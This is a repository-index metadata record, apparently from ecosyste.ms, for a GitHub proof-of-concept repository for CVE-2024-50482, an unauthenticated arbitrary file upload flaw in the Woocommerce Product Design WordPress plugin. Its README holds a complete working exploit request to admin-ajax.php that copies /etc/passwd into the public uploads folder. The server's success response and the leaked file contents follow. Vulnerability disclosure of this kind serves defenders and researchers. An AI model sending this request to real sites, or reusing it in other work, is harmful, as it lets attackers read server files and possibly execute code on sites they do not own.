{"id":21125677,"url":"https://github.com/randomrobbiebf/cve-2024-50482","last_synced_at":"2026-02-12T14:33:05.021Z","repository":{"id":261244706,"uuid":"883725552","full_name":"RandomRobbieBF/CVE-2024-50482","owner":"RandomRobbieBF","description":"Woocommerce Product Design \u003c= 1.0.0 - Unauthenticated Arbitrary File Upload","archived":false,"fork":false,"pushed_at":"2024-11-05T13:21:14.000Z","size":5,"stargazers_count":0,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-22T14:02:25.447Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-05T13:19:05.000Z","updated_at":"2024-11-05T13:21:18.000Z","dependencies_parsed_at":"2024-11-05T14:39:38.235Z","dependency_job_id":null,"html_url":"https://github.com/RandomRobbieBF/CVE-2024-50482","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-50482"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2024-50482","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50482","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50482/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50482/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50482/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-50482/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-50482/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29368690,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-12T08:51:36.827Z","status":"ssl_error","status_checked_at":"2026-02-12T08:51:26.849Z","response_time":55,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:20.481Z","updated_at":"2026-02-12T14:33:05.003Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-50482\nWoocommerce Product Design \u0026lt;= 1.0.0 - Unauthenticated Arbitrary File Upload\n\n# Description:\nThe Woocommerce Product Design plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n\n```\nPublished: 2024-10-25 00:00:00\nCVE: CVE-2024-50482\nCVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nCVSS Score: 9.8\nSlugs: woo-product-design\n```\n\nPOC\n---\n\n```\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: kubernetes.docker.internal\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all\u0026paged=1\u0026s\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 53\nOrigin: http://kubernetes.docker.internal\nConnection: keep-alive\n\naction=pc_added_uploaded_image\u0026file[path]=/etc/passwd\n```\n\nResponse\n---\n\n```\n{\n  \"message\" : \"Image Uploaded Successfully\",\n  \"url\" : \"http://kubernetes.docker.internal/wp-content/uploads/wcpc/images/uploaded_images/passwd\",\n  \"path\" : \"/var/www/html/wp-content/uploads/wcpc/images/uploaded_images/passwd\",\n  \"status\" : \"success\"\n}\n```\n\nExample result\n\n```\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50482","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50482","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-50482/lists"}